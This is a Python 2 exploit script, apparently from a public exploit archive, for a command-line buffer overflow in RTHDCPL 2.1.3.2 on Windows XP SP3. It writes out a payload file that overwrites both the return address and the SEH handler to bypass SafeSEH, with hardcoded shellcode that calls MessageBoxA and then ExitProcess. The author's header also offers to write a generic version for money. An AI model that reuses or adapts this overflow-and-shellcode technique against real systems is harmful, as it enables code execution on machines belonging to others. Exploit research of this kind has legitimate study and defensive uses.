50 lines
No EOL
1.6 KiB
Raku
Executable file
50 lines
No EOL
1.6 KiB
Raku
Executable file
# done by BraniX <branix@hackers.org.pl>
|
|
# www.hackers.org.pl
|
|
# found: 2010.08.24
|
|
# tested on: Windows XP SP3 Home Edition
|
|
# SafeSEH bypass
|
|
|
|
# App. has classic buffer overflow vulnerability
|
|
# it can be triggered by passing a too long argument
|
|
# as a startup parameter. Shellcode can by run via classic
|
|
# ret overwrite or SEH Handler overwrite ... so it's a mini-combo ;)
|
|
|
|
# Ps. If you need a generic exploit ...
|
|
# (no hardcoded VA'a), write it yourself ;) or 'donate few' $$$
|
|
# we will c0de it for You ^^
|
|
|
|
filepath = "C:\\ShellCode\\RTHDCPL 2.1.3.2 - Exploit.bin"
|
|
f = open(filepath, "wb")
|
|
|
|
f.write('A'*4)
|
|
f.write('\x5E') # pop esi
|
|
f.write('\x5E') # pop esi
|
|
f.write('\xC3') # ret
|
|
f.write('\x90') # nop
|
|
|
|
f.write('[BraniX]')
|
|
f.write('A'*448) # mock
|
|
|
|
f.write('\xEB\x06') # jmp +6
|
|
f.write('\x90') # nop
|
|
f.write('\x90') # nop
|
|
|
|
f.write('\x70\x01\xA5\x01') # pop; pop; ret; address
|
|
|
|
f.write('\x83\xC1\x0C') # add ecx, 0Ch
|
|
f.write('\x88\x01') # mov byte ptr [ecx], al
|
|
f.write('\x83\xE9\x08') # sub ecx, 08
|
|
f.write('\x50') # push eax
|
|
f.write('\x51') # push ecx
|
|
f.write('\x51') # push ecx
|
|
f.write('\x50') # push eax
|
|
f.write('\xE8\xC5\x08\x27\x7E') # call user32.MessageBoxA
|
|
|
|
f.write('\x50') # push eax
|
|
f.write('\xE8\xE7\xCB\x6E\x7C') # call kernel32.ExitProcess
|
|
|
|
f.write('\xCC'*1500) # int 3's
|
|
|
|
f.close()
|
|
|
|
print "Done ..." |